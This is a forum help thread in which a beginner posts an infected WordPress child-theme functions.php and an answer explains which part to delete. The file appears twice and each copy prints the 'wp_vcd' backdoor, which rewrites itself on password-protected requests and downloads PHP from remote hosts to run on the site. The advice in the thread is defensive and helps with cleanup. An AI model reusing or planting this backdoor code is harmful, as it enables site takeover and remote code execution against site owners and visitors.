I have been told that the code below contains malware and this is what the hosting guys sent me. But I do not know where this would be or what it means. I am a beginner so apologies if it sounds dumb.
functions.php /home/sites/3a/e/e806688333/public_html/wp-content/themes/listify/functions.php generic. file.get.contents.0
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd73f3077ba6aca159219759cddb58d11'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
if (($tmpcontent = @file_get_contents(".php") OR $tmpcontent = @file_get_contents_tcurl(".php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(".php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
/**
* Listify child theme.
*/
// Gogout page redirect to homepage
add_action('wp_logout','go_home');
function go_home(){
wp_redirect( home_url() );
exit();
}
// Fin
function listify_child_styles() {
wp_enqueue_style( 'listify-child', get_stylesheet_uri() );
}
add_action( 'wp_enqueue_scripts', 'listify_child_styles', 999 );
/** Place any new code below this line */
// Code for city img
function custom_listify_cover_image( $image, $args ) {
if ( ! isset( $args[ 'term' ] ) ) {
return $image;
}
$term = $args[ 'term' ];
/**
* Only edit the URL here.
*
* Do not add the name of the image to this URL.
*
* Once the URL is set upload images to your web server's directory with the name
* of each of your terms slug.
*
* Example:
* Restaurants = .jpg
*/
$url = '/pics/';
$image = array( $url . $term->slug . '.jpg' );
return $image;
}
add_filter( 'listify_cover_image', 'custom_listify_cover_image', 10, 2 );
/**
* Limit Photo Uploads to Listing Owner
*/
function limit_who_can_upload($can) {
global $post;
if ( $post->post_author == get_current_user_id() ) {
return $can;
}
return false;
}
add_filter( 'listify_can_upload_to_listing','limit_who_can_upload' );
/**
* Listify - Default Image for Listings
*/
function custom_default_listify_cover_image( $image, $args ) {
global $post;
if ( $image ) {
return $image;
}
$image = array( '/pics/cover.jpg' );
return $image;
}
add_filter( 'listify_cover_image', 'custom_default_listify_cover_image', 10, 2 );
/**
* Listify - Faire fonctionner l'adresse en Espagne (Andalousie)
*/
function custom_address_data( $address, $geocoded_address ) {
$address_data = $geocoded_address->results[0]->address_components;
foreach ( $address_data as $data ) {
switch ( $data->types[0] ) {
case 'administrative_area_level_2' :
$address[ 'administrative_area_level_2' ] = sanitize_text_field( $data->long_name );
break;
}
}
return $address;
}
add_filter( 'job_manager_geolocation_get_location_data', 'custom_address_data', 10, 2 );
function custom_address_replacements( $replacements, $args ) {
$administrative_area_level_2 = isset( $args[ 'administrative_area_level_2' ] ) && '' != $args[ 'administrative_area_level_2' ] ? $args[ 'administrative_area_level_2' ] : false;
$replacements[ '{administrative_area_level_2}' ] = $administrative_area_level_2;
return $replacements;
}
add_filter( 'woocommerce_formatted_address_replacements', 'custom_address_replacements', 10, 2 );
function custom_formatted_address( $parts ) {
global $post;
$parts[ 'administrative_area_level_2' ] = $post->geolocation_administrative_area_level_2;
return $parts;
}
add_filter( 'listify_formatted_address', 'custom_formatted_address' );
function custom_address_formats_shim( $formats ) {
$es = $formats[ 'ES' ];
$formats[ 'ES' ] = str_replace( '{state}', '{administrative_area_level_2}', $es );
return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats_shim', 90 );
/**
* Faire fonctionner l'adresse en Espagne (Andalousie)
*/
function custom_address_formats( $formats ) {
$formats[ 'ES' ] = "{address_1}\n{address_2}\n{postcode} - {city}\n{administrative_area_level_2} (Spain)";
return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats', 20 );
/**
* Enlever les notifications de wordpress et Plugin
*/
global $user_login;
get_currentuserinfo();
if (!current_user_can('update_plugins')) { // checks to see if current user can update plugins
add_action( 'init', create_function( '$a', "remove_action( 'init', 'wp_version_check' );" ), 2 );
add_filter( 'pre_option_update_core', create_function( '$a', "return null;" ) );
}
////////////////////////////////////////////////////////////////////////
// BuddyPress Profile URL Integration //////////////////////////////////
////////////////////////////////////////////////////////////////////////
add_filter('wpdiscuz_profile_url', 'wpdiscuz_bp_profile_url', 10, 2);
function wpdiscuz_bp_profile_url($profile_url, $user) {
if ($user && class_exists('BuddyPress')) {
$profile_url = bp_core_get_user_domain($user->ID);
}
return $profile_url;
}//
//Remove WooCommerce's annoying update message
remove_action( 'admin_notices', 'woothemes_updater_notice' );
//Able shortcode on job description
add_filter( 'the_job_description', 'do_shortcode' );
I have been told that the code below contains malware and this is what the hosting guys sent me. But I do not know where this would be or what it means. I am a beginner so apologies if it sounds dumb.
functions.php /home/sites/3a/e/e806688333/public_html/wp-content/themes/listify/functions.php generic. file.get.contents.0
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd73f3077ba6aca159219759cddb58d11'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='0bb00640fa54049fc4c2c5e080f9f51a';
if (($tmpcontent = @file_get_contents("http://www.facocs/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
/**
* Listify child theme.
*/
// Gogout page redirect to homepage
add_action('wp_logout','go_home');
function go_home(){
wp_redirect( home_url() );
exit();
}
// Fin
function listify_child_styles() {
wp_enqueue_style( 'listify-child', get_stylesheet_uri() );
}
add_action( 'wp_enqueue_scripts', 'listify_child_styles', 999 );
/** Place any new code below this line */
// Code for city img
function custom_listify_cover_image( $image, $args ) {
if ( ! isset( $args[ 'term' ] ) ) {
return $image;
}
$term = $args[ 'term' ];
/**
* Only edit the URL here.
*
* Do not add the name of the image to this URL.
*
* Once the URL is set upload images to your web server's directory with the name
* of each of your terms slug.
*
* Example:
* Restaurants = http://yourwebsite/images/directory/restaurants.jpg
*/
$url = '/pics/';
$image = array( $url . $term->slug . '.jpg' );
return $image;
}
add_filter( 'listify_cover_image', 'custom_listify_cover_image', 10, 2 );
/**
* Limit Photo Uploads to Listing Owner
*/
function limit_who_can_upload($can) {
global $post;
if ( $post->post_author == get_current_user_id() ) {
return $can;
}
return false;
}
add_filter( 'listify_can_upload_to_listing','limit_who_can_upload' );
/**
* Listify - Default Image for Listings
*/
function custom_default_listify_cover_image( $image, $args ) {
global $post;
if ( $image ) {
return $image;
}
$image = array( '/pics/cover.jpg' );
return $image;
}
add_filter( 'listify_cover_image', 'custom_default_listify_cover_image', 10, 2 );
/**
* Listify - Faire fonctionner l'adresse en Espagne (Andalousie)
*/
function custom_address_data( $address, $geocoded_address ) {
$address_data = $geocoded_address->results[0]->address_components;
foreach ( $address_data as $data ) {
switch ( $data->types[0] ) {
case 'administrative_area_level_2' :
$address[ 'administrative_area_level_2' ] = sanitize_text_field( $data->long_name );
break;
}
}
return $address;
}
add_filter( 'job_manager_geolocation_get_location_data', 'custom_address_data', 10, 2 );
function custom_address_replacements( $replacements, $args ) {
$administrative_area_level_2 = isset( $args[ 'administrative_area_level_2' ] ) && '' != $args[ 'administrative_area_level_2' ] ? $args[ 'administrative_area_level_2' ] : false;
$replacements[ '{administrative_area_level_2}' ] = $administrative_area_level_2;
return $replacements;
}
add_filter( 'woocommerce_formatted_address_replacements', 'custom_address_replacements', 10, 2 );
function custom_formatted_address( $parts ) {
global $post;
$parts[ 'administrative_area_level_2' ] = $post->geolocation_administrative_area_level_2;
return $parts;
}
add_filter( 'listify_formatted_address', 'custom_formatted_address' );
function custom_address_formats_shim( $formats ) {
$es = $formats[ 'ES' ];
$formats[ 'ES' ] = str_replace( '{state}', '{administrative_area_level_2}', $es );
return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats_shim', 90 );
/**
* Faire fonctionner l'adresse en Espagne (Andalousie)
*/
function custom_address_formats( $formats ) {
$formats[ 'ES' ] = "{address_1}\n{address_2}\n{postcode} - {city}\n{administrative_area_level_2} (Spain)";
return $formats;
}
add_filter( 'woocommerce_localisation_address_formats', 'custom_address_formats', 20 );
/**
* Enlever les notifications de wordpress et Plugin
*/
global $user_login;
get_currentuserinfo();
if (!current_user_can('update_plugins')) { // checks to see if current user can update plugins
add_action( 'init', create_function( '$a', "remove_action( 'init', 'wp_version_check' );" ), 2 );
add_filter( 'pre_option_update_core', create_function( '$a', "return null;" ) );
}
////////////////////////////////////////////////////////////////////////
// BuddyPress Profile URL Integration //////////////////////////////////
////////////////////////////////////////////////////////////////////////
add_filter('wpdiscuz_profile_url', 'wpdiscuz_bp_profile_url', 10, 2);
function wpdiscuz_bp_profile_url($profile_url, $user) {
if ($user && class_exists('BuddyPress')) {
$profile_url = bp_core_get_user_domain($user->ID);
}
return $profile_url;
}//
//Remove WooCommerce's annoying update message
remove_action( 'admin_notices', 'woothemes_updater_notice' );
//Able shortcode on job description
add_filter( 'the_job_description', 'do_shortcode' );
- 1 Download the theme again and replace the files. But if you've been hacked, it is possible that other things happened to your website as well - it is best to consult an expert that will help you through this – kero Commented Nov 12, 2018 at 14:14
1 Answer
Reset to default 0Everything before this is malware:
<?php
/**
* Listify child theme.
*/
Delete everything before that, including the ?> in front of it.
Keep in mind that if someone got access to add this code, then they could've done a lot more. Follow all the steps in the codex: https://codex.wordpress/FAQ_My_site_was_hacked